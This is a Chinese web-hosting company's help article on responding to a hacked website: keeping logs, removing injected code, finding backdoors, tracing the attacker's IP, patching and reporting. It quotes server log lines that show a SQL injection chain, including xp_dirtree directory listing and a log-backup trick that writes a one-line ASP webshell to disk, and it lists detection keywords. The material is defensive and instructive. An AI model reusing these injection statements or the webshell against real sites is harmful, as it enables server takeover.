香港虚拟主机
本站公告
新闻资讯
虚拟主机帮助
域名帮助
服务器帮助
邮箱帮助
建站帮助
网站推广帮助
VPS帮助
特色主机帮助
网站备案专题
会员帮助信息
代理帮助信息
成功案例
保定远鹏电气设备有限公司-b…
什么是百度快照?为什么我网…
网站四个SEO关键时期,新站也…
谁说论坛外链不好做了?六个…
新站短期排名进首页秘密!教…
网站优化的网站描述descript…
学SEO必知的 内链、外链、黑…
什么叫百度无效收录 搜索引擎…
360搜索引擎比百度搜索引擎收…
网站更新是否要有规律 我们也…
您现在的位置: 江南数联 >> 帮助中心 >> 建站帮助 >> 正文

网站被黑了后我们该怎么办

  作者:admin    来源:本站原创    点击次数:29     更新时间:2016-1-28 9:08:51  
     
 
关注石头有礼
 
 

网站被黑了后我们该怎么办

很多朋友都遇到过网站被黑,插入恶意代码的经历。可能大家以为只要把这些代码删除了既可,但是,道高一尺,魔高一丈,如果只是简单删除代码以后,绝大部分的朋友会再次遇到……事实上,要很好地应对网站入侵,老猪总结了几个步骤如下,并根据以下几个步骤写了份案例附后,希望对大家有所帮助:

一、下载服务器日志,ftp传输日志。

当发现网站被黑以后,首先要做的就是下载日志文件,包括服务器日志和ftp传输日志,服务器的日志位置一般是位于c:\windows\system32\logfiles\w3svc1。ftp日志则取决于你的服务器所安装的ftp软件,比如serve-u默认是在安装目录下。但是,这边提醒一点,既然你今天看到这篇文章,服务器的各种日志,一定要转移出默认的地方,同时设置一下删除保护。对于虚拟主机用户。一般你的空间提供商都会提供3天之内的日志以及1个月的ftp日志下载,具体可以咨询你的空间提供商。下载日志这点很重要。它是我们接下去找出漏洞的关键。

二、替换所有恶意代码

进行下载日志的同时,应该开始删除恶意代码,以免影响用户体验。如果你拥有服务器,推荐你使用老马写的findstr,把恶意插入的代码批量替换掉。如果你使用虚拟主机,有部分虚拟主机提供批量替换功能。如果你的虚拟主机没有提供这样的功能(破烂货,赶快换掉),那你可以去下载一个雷客图asp站长安全助手。来进行此项操作。这项操作要谨慎点,因为是对内容直接进行替换,稍微一马虎可能让你的网页内容面目全非。

三、下载到本地杀毒,或者服务端杀毒

接下来,我们要开始找出入侵的幕后黑后了。记住,发现病毒先不要忙着删除。如果你拥有个人服务器,可以开启杀毒软看看,如果是使用虚拟主机可以下载到本地,用杀毒软件杀,或者用我刚才说的那个asp站长安全助手。发现病毒以后,刚才说的,不要忙着杀掉。查看那个病毒文件的修改时间。这个步骤是最关键的。一般对方不会只留一个后门,可能会有漏网之鱼。这时你可以搜索刚找到的那个病毒文件的修改时间,检查这段时间建立或者修改了什么文件。那些文件都是嫌疑犯,统统记住他们的文件名,注意,这边没有让你删除,要先记住文件名!

这边要提到一种情况,对方的木马很隐秘,找不到,这个时候,你需要在所有的网页文件中,查找一些木马常用的词,比如asp木马,一般会有这些字符出现在木马中,比如“木马”,“免杀”,“w”,“shell”等等字符,有出现这些字符的,可能为对方留下的后门

四、同时,查找日志中的敏感词,如“select”,“and%201=1”,获得对方ip

获得对方的木马的文件名以后,这个时候要用到我们刚才的日志了来找到对方ip,看对方进行了什么操作。以某次反入侵经历例,通过查找特征字符,发现对方使用swz.asp这个木马文件作为后门。于是在日志中搜索swz.asp,发现对方入侵的ip,当然,如果你在上一个步骤没有找到木马,也可以通过查找““select”,“and%201=1”,这样一些入侵的蛛丝马迹,获得对方ip为220.162.26.96


五、在日志中查找该ip,了解对方入侵的过程。


在这些日志中查找“220.162.26.96”这个字符串。发现以下一些记录://后面为记录

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[41425] 2007-07-12 03:52:40 w3svc629501503 http://*******/ get http://*******/123.asp cid=187&id=1626 and exists (select * from sysobjects) -- 80 - 220.162.26.96 mozilla/4.0+(compatible;+msie+6.0;+windows+nt+5.0) 200 0 64

//123.asp出现漏洞,对方使用注入语句在获得权限

[41492] 2007-07-12 03:52:56 w3svc629501503 http://*******/ get http://*******/123.asp cid=187&id=1626;drop table d99_tmp;create table d99_tmp(subdirectory varchar(100),depth varchar(100),[file] varchar(100)) insert d99_tmp exec master..xp_dirtree "d:\", 1,1-- 80 - 220.162.26.96 mozilla/4.0+(compatible;+msie+6.0;+windows+nt+5.0) 200 0 64

[41494] 2007-07-12 03:52:56 w3svc629501503 http://*******/ get http://*******/123.asp cid=187&id=1626 and (select char(124)+cast(count(1) as varchar(8000))+char(124) from d99_tmp)=0 --|57|80040e07|将_varchar_值_‘|13|‘_转换为数据类型为_int_的列时发生语法错误。 80 - 220.162.26.96 internet+explorer+6.0 500 0 0

[47001] 2007-07-12 04:23:06 w3svc629501503 http://*******/ get http://*******/123.asp cid=187&id=1626;drop table d99_tmp;create table d99_tmp(subdirectory varchar(100),depth varchar(100),[file] varchar(100)) insert d99_tmp exec master..xp_dirtree "e:\wwwroot\", 1,1-- 80 - 220.162.26.96 mozilla/4.0+(compatible;+msie+6.0;+windows+nt+5.0) 200 0 64

//利用了master..xp_dirtree

[47635] 2007-07-12 04:24:47 w3svc629501503 http://*******/ get http://*******/123.asp cid=187&id=1626;alter database mytable set recovery full-- 80 - 220.162.26.96 mozilla/4.0+(compatible;+msie+7.0;+windows+nt+5.1;+kugoosoft) 200 0 0

[47699] 2007-07-12 04:25:12 w3svc629501503 http://*******/ get http://*******/123.asp cid=187&id=1626;create table ahcmd (a image)-- 80 - 220.162.26.96 mozilla/4.0+(compatible;+msie+7.0;+windows+nt+5.1;+kugoosoft) 200 0 0

[47754] 2007-07-12 04:25:25 w3svc629501503 http://*******/ get http://*******/123.asp cid=187&id=1626;backup log mytable to disk = ‘c:\ahcmd‘ with init-- 80 - 220.162.26.96

[47758] 2007-07-12 04:25:31 w3svc629501503 http://*******/ get http://*******/123.asp cid=187&id=1626;insert into ahcmd (a) s (‘<%execute request("")%>‘)-- 80 - 220.162.26.96

//插入一句话木马

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

答案揭晓了,这是由于老猪之前的程序员所编写的页面123.asp传入参数过滤不严格,导致了对方在服务器上为所欲为,同时,从日志上也可以看到,master..xp_dirtree这个存储过程也起到了助纣为虐的作用。

七、弥补对方入侵漏洞。

接着,根据日志的提示,修改123.asp页面,字符串参数过滤单引号,数字参数格式化为数字类型。在查询分析器使用sp_dropextendedproc ‘xp_dirtree‘删除掉它,同时删除掉其他的一些危险的存储过程。

八、修改ftp密码,超级管理员密码,3389登陆端口,用户名,密码。

接着就是善后了。对方如果已经入侵了你的站点,这些密码都不再是密码,因此最保险的做法就是全部改掉。

九、将对方的ip,入侵时间,日志提交给当地网警。ping对方使用的僵尸网站,查询对方网站所用ip,打电话到对方网站所在地的通信管理局投诉。

毛主席教导我们,“宜将剩勇追穷寇,不可沽名学霸王”,本着除恶务尽的原则,一定要报案,这需要你保存对方入侵的日志,还有ip提供给警方。同时,如果对方插入了恶意代码里面包含网址,例如www.abc.com那恭喜你,整他的法子更多了,可以向信息产业部报案,可以ping这个站点,比如ping www.abc.com返回的ip为 222.222.222.222是位于广东揭阳的,那你还可以打电话到广东揭阳的通信管理局投诉。这个时候,就是你尽情发泄的时候了。

本章关健词:江南数联 域名注册 海外虚拟主机 G享虚拟主机 国内虚拟主机 企业邮箱 网站建设 自助建站 400电话申请 微聚商

 
  版权申请:网站被黑了后我们该怎么办出自江南数联dns06.com未经授权请勿转载!  
 
  • 上一篇帮助:

  • 下一篇帮助:
  •  
         

    扫一扫关注公众号有礼
    Copyright@2004-2015 江南数联 版权所有未经授权请勿复制!
    《中华人民共和国增值电信业务经营许可证》ISP证编号:皖B2-20080036 湘B2-20160056
    公司全称:永州石头网络技术有限公司(运营部)
    地址: 中国·湖南省永州市育才路158号 服务热线:400 616 9260
    安徽公司:安徽仁科信息技术有限公司 地址:合肥万和新城广场A-608 
    关注词:网站空间虚拟空间空间域名域名空间域名主机网站空间哪家好网站空间多少钱